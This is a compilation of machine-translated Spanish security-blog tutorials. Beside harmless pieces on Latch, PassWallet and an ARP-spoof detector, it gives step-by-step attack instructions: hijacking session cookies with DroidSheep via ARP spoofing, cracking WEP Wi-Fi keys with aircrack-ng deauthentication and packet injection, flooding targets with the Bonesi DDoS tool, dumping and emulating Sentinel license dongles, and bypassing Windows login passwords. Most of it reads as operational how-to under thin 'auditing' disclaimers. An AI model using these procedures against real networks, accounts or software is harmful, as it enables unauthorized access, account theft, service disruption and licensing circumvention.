Categories
Seguridad Informática

How to sniff network connections with DroidSheep

We introduce you DroidSheep, an application that is used to sniff network connections and capture all kinds of data such as the users / passwords of certain services.

Spying on someone else’s network connections without authorization is illegal, as well as unethical, so use this information at your own risk, after all, human knowledge belongs to the world.

In RedesZone.net we already talked about DroidSheep: DroidSheep, application for Android phones that allows you to steal passwordsThis time we have tested it and we want you to know how it works.

We will also show you how it works DroidSheep Guard, an application that detects if someone is doing ARP-Spoofing with DroidSheep or another application, perfect for protect us from prying eyes.

Tutorial on how to use DroidSheep

DroidSheep is a sniffer that searches the network to which login cookies are connected for different websites, such as Facebook, Tuenti, Google, Amazon, Linkedin, Youtube, and several more. In order to avoid it, we must first know how it works.

Its main way of working is to do an ARP-Spoof in encrypted networks, or simply listen for log cookies in open networks.

The developers have stopped supporting the application some time ago for legal reasons as indicated on their website, but we can find the .apk installer by searching the internet. The Latest official version is v14 and we need to be ROOT.

Link to version v14 tested by RedesZone

There are fake versions that claim to be v15 and higher, but they are nothing more than that, fakes, as explained by the DroidSheep developers in their account Official Twitter.

Once we install the application, it will create an access icon in the applications menu, from which we will run the program. The first thing we will see will be a screen with a legal notice, which we must accept to continue using the program. Accepted the message, we are at the main screen of the program.

Here we can see 2 options at the bottom, one that says “ARP-spoofing” and another that is called “Generic mode” ·

Arp-Spoofing must be used in networks encrypted by a WPA-WPA2 key to be successful, but we will be detectable to any sniffing detector program. If we deactivate this option we will be undetectable, but it will only work in open networks or with WEP encryption.

Generic mode is an option that allows us to capture all log cookies instead of those of certain predefined websites, to greatly increase the number of websites that we can impersonate.

Once we have selected the options we want, click on the Start button and the program will begin to search for cookies from websites that travel through our local network. When some type of traffic occurs, the program will capture it, showing us the results listed in its main window.

When we have the webs captured in the program, we can click on them and a menu will appear with various options, such as opening a site by impersonating the identity, or saving cookies.

By clicking on open site, an integrated web browser will open and load the selected website with the data from the log of the person from whom we have captured the cookies.

We can also add the results to a black list so that they do not appear again in future searches, or remove results from the list.

In the DroidSheep website we can see some demonstration videos of how the program works.

Tutorial on how to use DroidSheep Guard

Now we are going to teach you how to detect an ARP-Spoof attack with an Android mobile or tablet, and prevent us from stealing the access data of our Facebook, Tuenti, amazon and similar accounts.

As we have seen previously in the DroidSheep tutorial, it is very easy to do an ARP-Spoof from an Android device, and that cookies can be stolen with the login data of our social networks, or what is worse, online shopping websites, such as amazon, or the mail.

To prevent this from happening, the same creators of DroidSheep they have created another application called DroidSheep Guard that performs a continuous review of the ARP table of the router to which we are connected and launches a warning when it detects any strange change in it.

DroidSheep Guard is available for free on the Play Store. Once downloaded, we execute it by clicking on the icon that has been created in the applications menu.

The first thing we see on the main screen is a sliding bar in which we can establish how often we want the program to check the ARP table. Normal, and by default, they are 60 times per minute, that is, one per second, but so that it does not consume excess battery we can set 1 time every 2 seconds, which will also be effective.

We also have 3 options below that bar.

“Autostart / stop depending WiFi”: This option allows the program to choose which networks to activate and which networks not to activate. Normally it is activated in public networks when it is deactivated in private networks.

“Disable WiFi on alert”: It allows that, when the program detects a threat, it automatically deactivates the Wi-Fi. Recommended to have activated.

“Show status icon in notification bar”: Shows an icon in the notification bar with the status of the program.

Click on the button «Start protection » and the application status will change to «running«, At the bottom it will show us the IP and MAC address of the gateway of our router.

As long as there is no intrusion, the program will keep checking the ARP table constantly. If we suffer an ARP-Spoof, the program will automatically notify us with a warning window.

In this window we can choose if we want to open DroidSheep Guard, ignore the warning (not recommended) or deactivate Wi-Fi if we do not have the option to do it automatically activated.

With this program we can prevent our email accounts from being stolen with a “man in the middle” attack.

To stop monitoring the ARP table we must click on the “Stop protection” button in DroidSheep Guard and it will automatically stop monitoring said table.

Categories
Latch: Protege tus identidades digitales Seguridad Informática

How to register and start using Latch

In this manual we are going to help you to register a developer account in Latch and also how to start using Latch with our main services.

Before starting, we recommend read this section where we detail what Latch is and the possibilities it brings to administrators who want to protect their servers, administrators who want to provide extra security to their users and to the users themselves to obtain additional security when using a critical service such as banking.

Register in Latch as a developer

The first thing we have to do is enter the official Latch website and register as a developer, in this way we will have access to the necessary tools to be able to integrate this additional layer of security in our server and be able to offer users an extra security.

Registration is completely free and necessary to start the system.

latch_openssh_1

Once we have registered as a developer we must log in with our credentials through this website and we will enter the development section where we can add new applications to our account.

latch_openssh_2

Starting to create an application with Latch

On the left side of the web page we have “My Applications”, in this section we will manage our applications, we can create, edit and delete them. The first thing we have to do is click on “Add a new application” as you can see in the following screenshot:

latch_openssh_3

Then we just have to indicate the name of the application that we want our service to have and click on add application, as you can see here. We have called the application “OpenSSH-RedesZone”.

latch_openssh_3_1Once we click on adding the application, it will take us to the menu where to edit the information about the information. The most important part is the application ID and the secret key that we will later use when configuring the service. Latch allows us to select an image instead of that photo by default, in this way we can quickly differentiate the different services.

latch_openssh_4

In some services we can select a second authentication factor, an OTP key (One Time Password) where we will be asked for the randomly generated key in the mobile terminal. In this way, when logging in to the service or to our server, after we are asked for the username and password (or we use a private key), we will be asked for this additional password. We must warn that for example with OpenVPN we cannot use OTP due to the OpenVPN architecture, but with OpenSSH and other services we can, and we also recommend enabling it.

At the bottom we will put the contact information of the administrator to show it in the alerts that the end user receives. These data are optional, so we can choose not to put our data, although it is advisable to put at least one contact email.

latch_openssh_5

Once we have configured the application to our liking, we click on save changes and we can access the main menu of the applications where we will find all the ones we have created. From here we can edit the application, delete it and also access the control panel.

latch_openssh_6

Latch control panel

The control panel is where it will show us very important data such as the number of users paired in the service, access attempts that have been blocked, etc.

latch_openssh_7

Once we have created our application, we only have to implement the functionality in our service, be it WordPress, OpenSSH, OpenVPN or any other compatible one.

latch_openssh_8

If you access the Latch section You can see detailed manuals on how to configure it with various services.

Categories
Seguridad Informática

Manage and protect your passwords on Android with PassWallet

The use that we give to our Smartphones is increasing and with this the confidence with which we store our data in it is increasing. To prevent such data from falling into the wrong hands we must use an application that protects, encrypts and hides our data.

To protect our passwords from third parties we can use an application called PassWallet.

PassWallet offers us the following features:

  • Theft mode that hides the application from the application list.
  • Custom themes that make it easy for us to add credit cards, documents, websites and more.
  • Floating window function that allows us to easily interact with other applications.
  • Synchronization with Google Drive and Dropbox.
  • Password generator.
  • Self-destruct option.
  • Encrypted data can only be opened with the application.

PassWallet is available for download on the Play Store for free in a 30-day trial version. If it convinces us we can also buy it in the Play Store for a price of € 4.

Once downloaded and installed on our Android device, we execute it. In the first place, it will ask us to create our master password to be able to access the program. The password will be between 4 and 12 characters long.

Once the password is entered, we will have to specify a secret question and answer to retrieve said password.

passwallet_foto_2

Once configured we can see the program. It will ask us first if we want to configure a server to store our data in the cloud. We click on “yes” (if we want to store it in the cloud) and choose which server we want to use.

passwallet_foto_3

We authenticate to the server and go back.

passwallet_foto_4

We can already see the main window of the application.

passwallet_foto_5

Let’s take a quick look at the options first. To access them we will click on the button that has 3 points in the upper right part of the screen or by opening the settings menu depending on our device.

passwallet_foto_6

In the Passwords section we can choose if we want to hide our password and specify the length of the password for the password generator. In the same way we can change our master password and the secret question / answer.

In the Security section we can activate the hidden mode of the program so that it does not appear in the list of programs. To access it we must enter an asterisk * followed by our master password. We can also activate the self-deletion of data after a certain number of access failures.

In Data Management we can manage our account in the cloud, as well as import and export the files.

We return to the main window of the application. We can see several example accounts that the application brings.

passwallet_foto_7

To add a new account, click on the + button that appears in the upper right part of the screen. Several templates will appear depending on the type of data we want to save: web, bank details, mail, premium accounts, etc.

passwallet_foto_8

We will create a new web account. We fill in the data that appears on the screen: username, password, link to the web, etc.

passwallet_foto_9

We will click on the tick in the upper right part to save the page.

passwallet_foto_10

It will now appear listed on the main screen.

passwallet_foto_11

In the same way we can store any data safely in the system.

Categories
Seguridad Informática

How to Backup a Dongle

WARNING: The process of copying a USB key can damage the device. Work with extreme caution.

Companies have always been concerned about protecting their computer creations against hackers. Many strategies have been used, with worse or better success. These strategies had their counterproductive part for the user: many times they implied the use of unreliable devices, such as key disks, which could be lost, broken or damaged in any way, making the use of the program impossible and losing productivity.

Currently, very fragile key drives have been replaced by USB key drives. What is a key device ?:

“A small hardware device that connects to a computer, usually to authenticate a piece of software. When the hardware device, usually called a dongle, is not connected, said software runs in a restricted mode or it doesn’t run at all. This type of device is frequently used in very expensive programs and in niche software, such as CAD applications, hospital management or digital printing. “
Source: Wikipedia

OBJECTIVE:

In this manual we will see how to make backup copies of those hardware devices, from now on I will call them dongles, so that, in case of breakage, loss or damage, you can continue working without having to wait for the source company provide us with another.

REQUIREMENTS:

The instructions in this manual are tested for Windows XP with SP2 and SP3. With other operating systems, such as Windows Vista Business., I have obtained several blue screens that made me leave the test as impossible.

TOOLS:

– The dongle, of course. It can be anyone that I know of; But it is quite possible that some manufacturers have implemented some security systems to prevent copying of these, for fear of hacking the accompanying software.

Be VERY sure of the type of dongle that you are going to try to Backup, since each brand needs a different emulator and maybe a different dump.

– Program for emulation. I have used Sentemul. This software is paid; and I am not aware of any free. However, if it exists, you must work with great care, since the process of backing up a dongle can damage it, as can emulation process.

– Program to dump the dongle. You must be careful not to use the wrong software to dump, you can damage the dongle.
In this manual I have used a program called neobit11.exe, from neobit.org.

You can download it from here: Download Neobit11

The appropriate drivers for your dongle in question. For example: if it is a Sentinel, you will need the Sentinel drivers.

THE PROCESS:

The steps that we must follow are the following:
-Dongle dump.
-Emulated of said copy, in case of loss, theft or failure of the original.

DONGLE DUMP

Dumping the dongle is one of the critical points in the process, which can be quite risky. The first thing that must be clear is the brand of the dongle to which you will backup, to do it correctly.
In our case, it has been tested with a Sentinel, so Sentinel drivers have been installed. If they were not installed, the program would give an error. I can’t specify the drivers exactly, because they vary over time and with each version.
Here’s what the neobit11 program looks like:

You see that there are several tabs. The last three correspond to the brand of the dongle. The keygen tab is for other types of work that are not the objective of the manual.

Since our original dongle is a Sentinel, we go to the Sentinel tab.
We can see several options; the two that put Specify Developer Id and Specific Write Password do not interest us, since they are for a little more advanced users.

The first, Specify Developer Id is to make a copy of a copy, without the need for the original dongle.

The second, Specify Write Password, is only to try to make the process faster (which sometimes and depending on the type of dongle can take forever).

In our case, we will limit ourselves to specifying a name for our dongle in the Dump and Solve text box, as the image indicates.

Dongle backup

The name is arbitrary, you can put whatever you want, but finished in dng. I have chosen adslzone as the name.

Remember: the correct drivers must be correctly installed before pressing the Dump & Solve button. Otherwise, an error would be produced, the text of which could be “Can’t find dongle” or “error initializing Sentinel API”, apart from other errors derived from any other failure of the program.

BEFORE YOU PRESS DUMP & SOLVE: It is advisable not to perform this operation on a desktop that does NOT have a UPS. Ideally, a laptop connected to the mains and with a fully charged battery.

Once the Dump & Solve button is pressed, the process will begin, which has several phases:

1. Find the dongle. If you have the dongle correctly connected to a USB port that works normally, this step should not give any error. However, if an error occurs, you simply close the program, change the site dongle and run again.

2. Detect the algorithms and decrypt them. This step is the most costly in time. Depending on the dongle in question, it can even take several hours, reaching 5 or 6 hours in some cases that I have had in my hands.

3. Creation of the dump file, the .dng. This file will be the one that we will use in the emulator later.

In each of these steps, the progress bar will fill in gradually. The progress bar is the one that can be seen in the image, pointed by the red arrow.

Dongle backup

Each of the steps can fail and lead to specific errors. In my case, only two errors came to light: the error “can’t find dongle” (can’t find dongle) and “impossible to initialize sentinel API” (error initializing Sentinel API). The first of them happens when the program cannot find the dongle in any way and the second happens due to incorrectly installed or disabled drivers or because it is not running. (Remember that it was recommended to install the drivers as a service that runs when Windows starts).

When the process is finished, you have already created the dongle backup file, ready to be emulated in case you need it. That will be the next part of the manual.

If any error occurs, it will appear in the program’s Log window.

Dongle backup

EMULATION OF THE .DNG FILE

To do this part, we will use the Sentinel Emulator program. This program can be downloaded from this link.

This program uses a dng dump file to emulate the behavior of the dongle to which that file belongs. Its operation is not complicated at all, however, it can give some blue screens with some programs. In my case, simple bluetooth programs caused blue screens when working together with the emulator.

Let’s see an overview of the program.

Dongle backup

We see 3 tabs, each of them has a specific functionality.

The emulator tab is the one that will be used to emulate the dongle, it starts the service and stops it.

The Dongles tab is responsible for loading the file dumped in the previous steps.

The Driver tab is where we will install the necessary driver for the program to work.

The Driver tab is where we should first head to first.

As you can see, we have 2 options, manual execution and automatic execution. The first thing to do is click on the Install Driver button. Once pressed, the two options will be enabled. I advise manual execution. In this way, if there is a failure, the program will not run at startup, and it can cause some problems if the two conflicting programs run as a Windows service.

When we have decided what type of start we want, we must click on Save state and it will be saved.

Once this is done, we go to the Emulator tab.

Dongle backup

This tab is where the dongle will be emulated. We see several options.
License: Program license. This is where you would put the license of the program.
Licensed Dongles: This is the license of the dongle to be emulated
Computer ID: The computer id.

What we have to do is press the Start Service button for the service to run. When pressed, we see this:

Dongle backup

The status of the program has changed. It informs you that the service is already running and running.
Now, we must go to the Dongles tab, to load the dump file, the .dng of the previous steps.

Dongle backup

We click on Load Dump and choose the file to load, in our case, we have called it adslzone.dng

Dongle backup

Once loaded, we return to the Emulator tab, to check that the file has been loaded and we have it working correctly. It should come out something similar to this:

Dongle backup

I have omitted the License, Licensed Dongle and Computer ID part, as it is private data.

Once this comes out, you already have the dongle emulated and working 100%. In this way, the company no longer has to stand still and lose productivity while the new dongle is brought to it.

Categories
Seguridad Informática

How to hack a WiFi network without connected clients

This manual is oriented to generate traffic when there is no client associated with the access point (or Wi-Fi network), (if there are no clients there is no traffic), it is an attack that once done generates a lot of traffic, but it does not always work with all wifis networks. Once this is clarified we can begin (I have used Wifiway 1.0 Final).

You can download it from the official website.

Change the MAC of our wireless card:

We open a terminal and put:

macchanger -m MAC WHAT WE WANT [interfaz]

Example:

macchanger -m 00: 01: 02: 03: 04: 05 wlan0

We put the card in monitor mode to be able to take the packages

As in the previous manual we said …

airmon-ng start [interfaz]

Example:

airmon-ng start wlan0

We open airodump to point channel, bssid and ssid

We open airodump-ng, from Start / Wireless / suite / airodump-ng and we see all the wifis that are around us, we point the channel that uses the wifi that we want to audit as well as the bssid and ssid of said wifi network.

Now we open a console (or terminal) and put the following:

airodump-ng -c CHANNEL -b BSSID -w CAPTURE NAME [interfaz]

Example:

airodump-ng -c 3 -b 00: 02: CF: 43: 23 -w capture wlan0

We leave this terminal open until the end, do not close it.

We associate with the wifi network (False Association)

Now we proceed to associate the AP with the spoofed MAC that we have done before.

aireplay-ng -1 10 -e SSID -a BSSID -h MAC THAT WE HAVE (FALSE) [interfaz]

Example:

aireplay-ng -1 10 -e Gorrion -a 00: 02: CF: 13: 41 -h 00: 01: 02: 03: 04: 05 wlan0

We leave this console open, just like the one in airodump, DO NOT CLOSE THEM !!!

WiFi Chop Chop Hacker

We launched the chop chop attack

Now we are going to launch this attack to get a WEP packet.

We open the console and put:

aireplay-ng -4 -h MAC WHAT WE HAVE (FALSE) [interfaz]

WiFi Chop Chop Hacker

It will ask us if we want that WEP packet that it has taken, we must see that the BSSID it has is the same as the one we have selected, if it is, we put [y] and we give enter, then the process will begin (it takes approximately 1 minute), when it finishes it will create two files in root, one with a .CAP extension and the other with a .XOR extension.

WiFi Chop Chop Hacker

WiFi Chop Chop Hacker

Do not close the console, because if you do then you will pull your hair …

Know the IP of the wifi network

Now we are going to see what IP our WIFI uses, if we already know that it is the one for life (192.168.1.1) we can skip this step.

tcpdump -s 0 -n -e -r CAP FILE

WiFi Chop Chop Hacker

Since the name of the .cap file is so long, we copy (from the previous console) and paste here. We press enter and you will get many things, although you will easily identify the IP of the wifi network.

Manufacture ARP package to inject

We will make an ARP packet with the data from the AP and ours to later inject it with aireplay.

packetforge-ng -0 -a BSSID -h MAC WE HAVE (FALSE) -k IP OF AP -l IP OF RANGE -y FILE.XOR (copy and paste from the terminal opened before) -w PACKAGE NAME

WiFi Chop Chop Hacker

Example:

packetforge-ng -0 -a 00: 02: CF: 13: 15 -h 00: 01: 02: 03: 04: 05 -k 192.168.1.1 -l 192.168.1.10 -y replay_etc.xor -w packet

Manufactured ARP Packet Injection

We proceed to inject the previously manufactured ARP package to get IVs

aireplay-ng -2 -x 1024 -h MAC WHAT WE HAVE (FALSE) -r FORGED ARP FILE [interfaz]

And we give enter, it will tell us that if we want to use it, we put [y] and we hit enter to confirm.

Example:

aireplay-ng -2 -x 1024 -h 00: 01: 02: 03: 04: 05 -r wlan0 package

WiFi Chop Chop Hacker

In the capture as you see instead of 1024 I have 300, that is because some APs do not support so much traffic and are saturated, I would start with 300 and then go up from 300 to 300 until reaching the maximum (1024), in this case, I I hit 1024 and had no problem.

WiFi Chop Chop Hacker

Wait until there are enough IVs

Now we wait until the #data on the airodump screen (the one we have NOT closed before) goes up to a decent number.

As it goes up fast and it costs us nothing to wait, I would leave it until we reach a million (to make sure that the key can be removed by aircrack).

We run Aircrack-ng to get the key

Now we run aircrack to get the key, we open another console and we put:

aircrack-ng capture-01.cap

WiFi Chop Chop Hacker

You have to put the name of the capture that you have previously put in the airodump, if you do not remember or you have closed, go to / root and there you will see the .cap file, take note of its name and put it.

In a few minutes you will have the key.

Look at the difference in IVs and the short space of time, in 8 minutes, we have captured more than 250,000 IVs.

When there ARE clients connected No-Chop-chop

If the Wi-Fi network has an associated client, it is best to do the re-injection of ARP packets, it is the same as chop-chop but you don’t have to work so hard to forge the packet etc.

Re-injection of ARP packets:

aireplay-ng -3 -b BSSID -h ASSOCIATED CLIENT MAC [interfaz]

Example:

aireplay-ng -3 -b 00: 02: CF: 69: 69 -h 00: 02: CE: 11: 11 wlan0

It does not have to be instantaneous, wait a bit, about 4 or 5 minutes would be more than enough, I tell you the same as before, sometimes this type of attack does not work with certain access points or Wi-Fi networks.

Last comments on this manual

Good luck with this method of getting traffic, since sometimes it doesn’t go out the first time, and it doesn’t even always go out… it depends on the access point.

If the aircrack has not been able to get the key with a million IVs (unlikely), wait until it reaches a million and a half and it will (and if it does not come out, put it in the forum to see what is happening).

With this we finish the wireless audit with WEP encryption, I hope it has been useful, and above all, that you have as much fun as we did.

Categories
Seguridad Informática

How to hack a WiFi network with WEP encryption

Before starting the tutorial it is important to note that the black text are the steps, in italics clarifications about what each thing is and in bold attacks to generate traffic (not necessary if there is a large traffic at first).

We download the distribution to do the wireless audit, WiFiSlax or WiFiWay from their official web pages.

The MD5 of this file is: 911dc29262ee117e5e27770067bd2e71, so you can check that it has downloaded correctly.

Here you have the program to check it:

Download MD5 Verify Free

Once downloaded, we record it on a CD, configure the BIOS to boot from the CD and insert the CD.

We follow the instructions that come in the distribution, if by chance, it does not work for you and your computer is blocked (at startup), choose OPTION 2 at first, and in theory, it should leave you (I use option 2 since 1 does not work for me, because of the laptop’s graphics card).

I hope you have a wireless card compatible with MONITOR MODE, because if not, we will not be able to do anything.

If you don’t know if your card is compatible with MONITOR MODE, look at this link:

List of wireless cards for wireless auditing

Are you ready? Here we go…

Let’s see what our wireless card is called in Linux, we go to Shell and type iwconfig and press enter , there we see the names of the cards we have, in my case wlan0 corresponds to the USB adapter .

We put the card in MONITOR MODE: we go to the Shell (on the desktop) we write: airmon-ng start wlan0 and press enter , it takes a bit to load and will put monitor mode enabled we have everything ready!

Hack wifi

Note: If you don’t put this, the card CANNOT be put in monitor mode.

Another way to put it in monitor mode is: iwconfig wlan0 mode monitor and we press enter.

To check that it has actually been put into monitor mode, just type: iwconfig wlan0 and we press enter

Now we are going to capture absolutely all the packets that are over the air, necessary to be able to carry out the audit successfully, not only those of a certain channel, SSID etc, ALL!

We are going to Home / Wifislax / Current Suite / airodump-ng and we open it, it will tell us to put a card, we write ours (wlan0) and the name of the capture, by default it is capture (later it will be called capture-01.cap), we click apply and it tells us where it is saved, now We will see what there is and what packages there are, to whom they are sent, the channel used, etc.

Hack wifi

After 5min (or whatever you want to wait) we will: Home / Wifislax / Current Suite / aircrack-ng and we execute, we will open the .cap (created by the airodump) and we will see the IVS that we have taken, just SEE (packages that are really valid, the rest that I put in the airodump are not valid for this), although in the airodump in #Data it also puts it.

Hack wifi

If our network is not Telefónica (WLAN_XX) or Jazztel (Jazztel_XX) or another with a dictionary, we will need more than 400,000 ivs to be able to get the key. If it is a WLAN_XX or Jazztel_XX and you have more than 4 ivs (if they are more, the better) we can achieve it.

Important note: (If with the airodump, we only want to take vectors (IVS) we type the following: airodump-ng –ivs –w capture wlan0 The file will be in / root /)

Before continuing, let’s clarify concepts:
BSSID = is the MAC of our router
SSID = name of the wifi network of our router
STATION = is the MAC of the client wifi card (that is, the user that is connected).

For the WLAN_XX or Jazztel_XX we will continue in the following process:

We will take the WLAN dictionary that is in the distribution, we go to SHELL and we put:

wlandecrypter BSSID SSID keys.txt

We press enter and a text file will have been saved in / root /.

Hack wifi

Well we already have the WLAN_XX dictionary, now we go where we have saved the capture of the airodump, in the airodump we give CTRL + C to stop it and move the file capture-01.cap to the root (/ root /), where the keys.txt is.

Hack wifi

We type the following in Shell:

aircrack-ng –b BSSID –w keys.txt capture-01.cap

keys.txt is what we put in the wlandecrypter, and the capture-01.cap is what we put in the airodump.

It takes a very short time to get the key (in less than 5sec you have it if there is no problem), remember that the key is the one that puts ASCII at the bottom left (it does not appear in the capture).

Hack wifi

All this is in optimal conditions, with traffic etc.

If there is not enough traffic we can generate it:

Let’s do an ARP (heavy traffic) response attack:

aireplay -3 -b BSSID -h STATION wlan0

STATION is the connected user card.

Deauthentication attack to “cut” the connection of the connected user and that the wifi card and the router try to connect again, and therefore it finds a large data traffic.

The command is as follows:

aireplay-ng -0 50 –a BSSID –c STATION wlan0

Hack wifi

The 50 indicates the number of deauthentications, once deauthenticated, it will send us ARP packets that we will take with the previous attack, do not be deauthenticating all the time because otherwise we will not get ARP packets … it is not worth leaving it there all night deauthenticating, this is a job very fine that takes time.

In order to generate traffic in a network without any client that is connected, we have no choice but to do a CHOP-CHOP, it does not always work, but to prove that it does not remain.

Now imagine that we have our router is a jazztel router.

The routers that Jazztel distributes with their corresponding key on a sticker are no longer safe. It has happened the same as the WLAN_XX, in 10 minutes it is ready, here is what you have to do:

Download the Wifiway 1.0 Final:

Download WiFiWay 1.0 Final Free

The MD5 of this file is: 2fac135cad7b185706bbcb9c51f45932 and you do the same as with the Wifislax, you check it

You start it by following the instructions, you don’t have to touch anything, it starts automatically well.

Arrow The process to audit the Jazztel_XX is the same as the WLAN_XX, the only thing that changes is that we have to put (to generate the dictionary).

jazzteldecrypter BSSID SSID keys.txt

All the before and after process is the same as in the WLAN_XX.

NOTE: With the Wifiway you can also do everything that I have explained about Wifislax.

The wireless audit requires experience, at first things may not work as they have been commented here, it requires a little knowledge and be meticulous in the tests (especially if you are testing with external antennas orienting them to the router) look in detail at the MACs and identifiers of everything, a letter or a misplaced number can make us lose a good time until we realize it.

Of course, there are many more options in the WifiSlax and WifiWay suite, and even in the Aircrack Suite, but this is what I have used to audit my network.

If you have tried other methods to generate traffic, comment on how you have done it so that we can add it to the manual and thus improve it together.

Of course there are a lot of pages on the internet about manuals of this type, some more complete and others less, but this is what has worked for me and I share it with you, I think everything is explained in a clear way.

This manual has not been made to hack, crack or similar terms to the neighbors, it is a way to test the security of your wireless networks, we are not responsible for the misuse of this information, if by doing these steps you have been able to enter, something is wrong, therefore you must take the appropriate measures.

Categories
Seguridad Informática

Simulate DDoS attacks with Bonesi

Bonesi is an application that allows simulate DDoS attacks. This application is especially useful for network administrators to check the security and stability of their systems in an easy and simple way and to be able to correct possible DDoS vulnerabilities found in their systems before it is too late.

DDoS attacks are commonly known as the most widely used type of attack on web pages. In recent months, this type of attack has served to protest against different organizations, leaving the victim website out of service. Pirates also often use these attacks to take down a certain website and thus be able to blackmail or extort the victims.

Bonesi is an open source application, available for Linux systems that we can download from Google Code.

Once downloaded, we unzip it and first we must compile it for our system and architecture. To do this we open a terminal (or a TTY) and execute the following commands:

  • ./configure
  • make
  • make install

Once installed we check it by typing in the terminal «bonesi». It should return a list of parameters to use.

To perform an attack is very simple. Just type in the terminal “bonesi : ” changing for the IP of the device to be tested and for the port to attack, for example:

In our case we are going to carry out an attack from the Bugtraq2 virtual machine to the real machine. For this we will write bonesi 192.168.1.2:80 and press on enter.

bonesi_foto_2

We can see that packages are being sent from Bugtraq to the real machine. The use of the Bugtraq team is complete, it uses 100% of the processor. By doing this we can check if our equipment is effective against a DDoS attack or if we are protected. In our case we have noticed a slight drop in speed on the network but nothing important. This is normal as the virtual machine is significantly less powerful than the real machine. Among computers with similar characteristics, the effect would be much more remarkable, and by carrying out the attack with several devices at the same time, we could see how far we can go.

We can configure bonesi with a large number of parameters, fully adapting it to our needs. Consulting the help we can obtain the following:

Usage: bonesi [OPTION…]
Options:

  • -i, –ips = FILENAME filename with ip list
  • -p, –protocol = PROTO udp (default), icmp or tcp
  • -r, –send_rate = NUM ​​packets per second, 0 = infinite (default)
  • -s, –payload_size = SIZE size of the paylod, (default: 32)
  • -o, –stats_file = FILENAME filename for the statistics, (default: ‘stats’)
  • -c, –max_packets = NUM ​​maximum number of packets (requests at tcp / http), 0 = infinite (default)
  • –Integer IPs are integers in host byte order instead of in dotted notation
  • -t, –max_bots = NUM ​​determine max_bots in the 24bit prefix randomly (1-256)
  • -u, –url = URL the url (default: ‘/’) (only for tcp / http)
  • -l, –url_list = FILENAME filename with url list (only for tcp / http)
  • -b, –useragent_list = FILENAME filename with useragent list (only for tcp / http)
  • -d, –device = DEVICE network listening device (only for tcp / http)
  • -m, –mtu = NUM ​​set MTU, (default 1500)
  • -f, –frag = NUM ​​set fragmentation mode (0 = IP, 1 = TCP, default: 0)
  • -v, –verbose print additional debug messages
  • -h, –help print this message and exit

Despite being in beta, bonesi 0.2 is a very stable tool that offers great results to check the security of our servers against these attacks.

Categories
Seguridad Informática

Latch: Protect your digital identities

Latch is a system that allows protect access to our digital identities offering a additional layer of security. Latch allows us to control access to an account from our smartphones, we can have access blocked to a certain service through the terminal, and if we try to log in with the “latch” closed, even if we correctly enter the password, we will not be able to enter the account and it will notify us that they have tried to log in.

In this way, if a hacker takes over our credentials, they will not be able to log in if we have the Latch denying the connections. Users will be able to link their bank accounts, social networks, SSH servers, OpenVPN servers Among other services easily and quickly, when using them we must allow the connection through our smartphone.

The operation is similar to two-step authentication, to log in we must enter something we know (username and password) and also use something we have (our smartphone with Latch), in fact Latch allows the generation of a One Time Password (OTP) so that in addition to entering our usual credentials, we have to enter the one-time password that has been specifically generated by the application. In this way, if someone tries to access the service when the Latch is open, they will ask for a password that they do not have. As an additional feature, it is possible to schedule the automatic blocking of a service by time intervals, perfect while we are sleeping, and also to see in detail the statistics of users or access attempts from the developer control panel.

In the following diagram you can see how Latch works in a very simplified way.

General_Latch_Architecture

Currently Latch is compatible with the services of Telefónica, Movistar, Acens, Tuenti, Grupo Cortefiel, Caja Mar, among other services. In addition, the Latch SDKs and Plugins can be downloaded to easily integrate it with your service or web application, the available programming languages ​​are Microsoft .NET, Ruby, C, Python, PHP and Java.

We recommend you access the Latch official website where you will find documentation and everything you need to use Latch as users, and also to integrate it into your services as administrator.

In RedesZone we have made manuals to incorporate Latch to services such as OpenSSH and OpenVPN, in this way we will have our servers under control. Below you can access the manuals:

Categories
Seguridad Informática

How to access Windows 7 with the administrator user without knowing the password

There are several utilities that allow us to do this, but the one that we are going to use is one that is included in the utilities CD Hiren’s Boot CD.

Hiren’s Boot CD is a live-cd of essential utilities for solving computer problems. Useful for problems with the boot, partitions, bios, startup and others, it has many useful programs, as is the case of user password removal in Windows. We can see a list of the applications available in the official website.

One of the applications included in this CD is called WindowsGate 1.1 and it serves for remove Windows password verification, useful when you forget the password of a user to be able to access it quickly and without problems.

In order to remove the password, we must first download and burn the Hiren’s Boot CD. Once recorded, start the computer with it, and a menu will appear with all the applications that the live-cd has.

We must select and start the option “Min Windows XP” to access a Windows XP system on live-cd.

Once started, we will see a desktop with a series of pre-installed applications. We must execute Windowsgate 1.1, for this, we must click on the start menu, called “Start” and then, at the top, on HBCD Menu.

Once there, we will click on the «Programs» menu and then on passwords & keys / Windows login / WindowsGate and the application will be executed.

The WindowsGate application will be executed as you can see in this image:

We select from the list the operating system for which we want to disable the password verification, we mark the box “msv1_0.dll patch” and a message will appear indicating that it has been done correctly. “Logon password validation is OFF”.

Once this is done, we can restart our computer, remove the hiren’s boot cd, and boot into our system. When you ask us for the password of the administrator, or of any user, we can enter the one we want, or leave it blank, that the system will access that user without problems.

Once this tutorial has been followed, we can access the Windows account for which we had forgotten the password.

Another way to access a Windows system if we have forgotten the password is by deleting it for a specific user, but it still has validation for other users.

For this we can use the application «Offline NT / 2000 / XP / Vista / 7 Password Changer«, Included in Hiren’s Boot CD. This application does not need Mini Windows XP to work as it boots from command prompt.

To access it, we must select the menu Password Reset, and once there, «Offline NT / 2000 / XP / Vista / 7 Password Changer«.

And when pressing, the program will load. The first option it asks us is to select the partition where we have Windows installed. In our case we have 2 partitions, one for BOOT and one for Windows 7, we select Windows 7 and press enter.

Next it will ask us about the location of the log file. It usually detects it automatically, so by pressing enter we can continue with the process.

The program will load the necessary registry entries and ask us what we want to do. We select option 1 by default, and continue.

We select the default option of «Edit user data and password«.

Now we will see the users available in our system, we select the one we want to reset the password, in our case, the administrator “ruvelro” and press enter.

Some options will appear under the menu «user edit menu«, Among which we can highlight option 1, which establishes a blank password, and option 2, which will allow us to change the password and set the one we want. We select the option we want to perform, in our case 1, to remove the password and access the system without it.

We can see a message that tells us Password Cleared and other options. What we must do now is exit the program. To do this, in the first selection window we will press! To exit the user selection and then select «Q» to exit the program. It will ask us if we want to apply the changes made (password elimination) click “and” and enter, and the changes will be applied.

We will see a message that says «Edit Complete«. This means that the changes have been made successfully, so we can now restart our machine, remove the Hiren’s boot CD and enter Windows without any problem, selecting the user whose password we have removed

Kon bot

Another alternative that we have to login to a system for which we have forgotten the password is to use another application that is included in Hiren’s boot, called Kon Bot.

This application allows us to login into the system, as administrator, but without changing the password or disabling validation like the other methods.

Kon-Bot is compatible with:

  • Microsoft Windows XP 32Bit / 64Bit
  • Microsoft Windows Server 2003 32Bit / 64Bit
